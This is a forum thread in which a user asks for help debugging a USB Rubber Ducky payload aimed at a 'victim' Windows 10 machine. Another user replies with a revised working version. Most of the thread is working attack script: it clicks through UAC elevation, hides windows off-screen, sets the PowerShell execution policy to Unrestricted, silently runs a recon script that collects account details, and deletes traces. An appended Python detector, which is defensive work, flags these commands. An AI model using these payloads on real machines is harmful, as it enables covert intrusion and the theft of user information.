Default payloads not working properly


Saylor

Hey you.

I've just received my rubber ducky and I thought I'd give one of the generated payloads a go. My victim computer is a 64-bit Win10 machine and I selected User information and save to this computer as the components of my script.

After it's finished executing, the destination folder does have the Report.zip file in it but the file is empty. I don't even know where to start debugging this, so I'd really appreciate a nudge in the right direction. My keyboard layout is German, so I've selected Germany in the script generator as well and it seems to be using the German keys correctly (since the ALT+Y presses do work out fine).


1 hour ago, xcoder said:

Recheck your script.
You can post it here and I will check it for you.

Thank you!

Here it is:

DELAY 750
GUI r
DELAY 1000
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 750
ENTER
ALT SPACE
DELAY 1000
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
ENTER
STRING $fileSaveDir = New-Item  ($userDir) -ItemType Directory 
ENTER
STRING $date = get-date 
ENTER
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
ENTER
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' 
ENTER
STRING $Report = $Report + "<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" 
ENTER
STRING $UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired  
ENTER 
STRING $UserType = $UserInfo.AccountType 
ENTER
STRING $UserSid = $UserInfo.SID
ENTER  
STRING $UserPass = $UserInfo.PasswordRequired 
ENTER 
STRING $IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator') 
ENTER 
STRING $Report =  $Report + "<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>" 
ENTER  
STRING $Report = $Report + '</div>' 
ENTER
STRING $Report >> $fileSaveDir'/ComputerInfo.html' 
ENTER
STRING function copy-ToZip($fileSaveDir){ 
ENTER 
STRING $srcdir = $fileSaveDir 
ENTER
STRING $zipFile = 'E:\\Report.zip'
ENTER
STRING if(-not (test-path($zipFile))) { 
ENTER
STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
ENTER 
STRING (dir $zipFile).IsReadOnly = $false} 
ENTER
STRING $shellApplication = new-object -com shell.application
ENTER 
STRING $zipPackage = $shellApplication.NameSpace($zipFile) 
ENTER
STRING $files = Get-ChildItem -Path $srcdir 
ENTER 
STRING foreach($file in $files) { 
ENTER
STRING $zipPackage.CopyHere($file.FullName) 
ENTER 
STRING while($zipPackage.Items().Item($file.name) -eq $null){ 
ENTER
STRING Start-sleep -seconds 1 }}} 
ENTER 
STRING copy-ToZip($fileSaveDir) 
ENTER
STRING remove-item $fileSaveDir -recurse 
ENTER
STRING Remove-Item $MyINvocation.InvocationName 
ENTER
CTRL s
DELAY 750    
STRING C:\Windows\config-21642.ps1
ENTER
DELAY 1000
ALT F4 
DELAY 750  
GUI r 
DELAY 500 
STRING powershell Start-Process cmd -Verb runAs 
ENTER
DELAY 1000
ALT y 
DELAY 750   
STRING mode con:cols=14 lines=1 
ENTER
ALT SPACE 
DELAY 750  
STRING m 
DELAY 1000
DOWNARROW 
REPEAT 100
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false 
ENTER 
DELAY 750  
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-21642.ps1
ENTER

In the payload gen, I entered E:\ as the destination folder.


DEFAULT_DELAY 100
DELAY 5000
GUI r
DELAY 100
STRING cmd /Q /D /T:FE /F:OFF /V:ON /K mode con lines=1 cols=10
ENTER
DELAY 200
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set usb=%d
ENTER
DELAY 300
STRING %usb%
ENTER
DELAY 200
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 200
STRING powershell.exe -File %usb%\config-21642.ps1
ENTER
DELAY 200
STRING Exit
ENTER

Rubber Ducky: Twin Duck Firmware
Your PowerShell inside [USB FLASH DISK]: config-21642.ps1

Edited by xcoder
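
Added example, not part of the original thread: a defender-side sketch that flags the command lines both payloads above leave in process-creation logs, and alerts only when several appear on one host within a short window. The rule names, the record layout (time, host, command line), the two-minute window, the threshold of three, and the sample records are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

PS = r'powershell(?:\.exe)?"?\s+'
# Command-line traits taken from the two payloads quoted in this thread.
RULES = {
    "elevated_start_process": re.compile(PS + r"start-process\s+\S+\s+-verb\s+runas", re.I),
    "execpolicy_unrestricted": re.compile(PS + r"set-executionpolicy\s+'?unrestricted'?.*-scope\s+currentuser", re.I),
    "hidden_ps1_in_windir": re.compile(PS + r".*-windowstyle\s+hidden.*-file\s+c:\\windows\\[^\\]+\.ps1", re.I),
    "shrunken_console": re.compile(r"mode\s+con:?\s*(?:cols|lines)=\d{1,2}\b", re.I),
    "usb_label_lookup": re.compile(r"wmic\s+volume\s+get\s+driveletter.*findstr", re.I),
}

def match_rules(cmdline):
    """Return the names of all rules that fire on one command line."""
    return {name for name, rx in RULES.items() if rx.search(cmdline)}

def detect(events, window=timedelta(minutes=2), threshold=3):
    """Alert per host when >= threshold distinct rules fire inside one window.
    A single hit (e.g. an admin changing the execution policy) stays quiet."""
    hits = {}  # host -> list of (time, rule)
    for ts, host, cmdline in events:
        t = datetime.fromisoformat(ts)
        for rule in match_rules(cmdline):
            hits.setdefault(host, []).append((t, rule))
    alerts = {}
    for host, seen in hits.items():
        seen.sort()
        for start, _ in seen:
            rules = {r for t, r in seen if start <= t <= start + window}
            if len(rules) >= threshold and len(rules) > len(alerts.get(host, ())):
                alerts[host] = sorted(rules)
    return alerts

# Constructed process-creation records (time, host, command line); not real logs.
SAMPLE = [
    ("2024-01-01T10:00:00", "WS01", "powershell Start-Process cmd -Verb runAs"),
    ("2024-01-01T10:00:03", "WS01", "mode con:cols=14 lines=1"),
    ("2024-01-01T10:00:06", "WS01", "powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false"),
    ("2024-01-01T10:00:08", "WS01", r"powershell.exe -windowstyle hidden -File C:\Windows\config-21642.ps1"),
    ("2024-01-01T11:30:00", "WS02", "powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser"),
    ("2024-01-01T12:00:00", "WS03", "cmd /Q /D /T:FE /F:OFF /V:ON /K mode con lines=1 cols=10"),
    ("2024-01-01T12:00:02", "WS03", 'cmd /c wmic volume get driveletter, label | findstr "DUCKY"'),
    ("2024-01-01T12:00:04", "WS03", "powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false"),
]

if __name__ == "__main__":
    for host, rules in detect(SAMPLE).items():
        print(host, rules)
```

In practice the records would come from process-creation auditing with command-line capture enabled; the correlation step is what keeps a lone execution-policy change from raising an alert.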